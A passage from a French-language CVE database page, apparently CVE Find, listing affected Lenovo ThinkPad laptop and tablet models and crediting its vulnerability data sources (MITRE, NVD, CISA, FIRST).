Lenovo>>Thinkpad_x1_carbon_gen_6 >> Version -

Lenovo>>Thinkpad_x1_carbon_gen_7 >> Version -

Lenovo>>Thinkpad_x1_extreme >> Version -

Lenovo>>Thinkpad_x1_extreme_2nd >> Version -

Lenovo>>Thinkpad_x1_tablet_gen_2 >> Version -

Lenovo>>Thinkpad_x1_tablet_gen_3 >> Version -

Lenovo>>Thinkpad_x1_yoga_gen_2 >> Version -

Lenovo>>Thinkpad_x1_yoga_gen_3 >> Version -

Lenovo>>Thinkpad_x1_yoga_gen_4 >> Version -

Lenovo>>Thinkpad_x270 >> Version -

Lenovo>>Thinkpad_x280 >> Version -

Lenovo>>Thinkpad_x380_yoga >> Version -

Lenovo>>Thinkpad_x390 >> Version -

Lenovo>>Thinkpad_x390_yoga >> Version -

Lenovo>>Thinkpad_x395 >> Version -

Lenovo>>Thinkpad_yoga_370 >> Version -

Références

Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC) sont maintenues par MITRE Corporation, et les informations sur les configurations logicielles et matérielles (CPE) proviennent du NVD.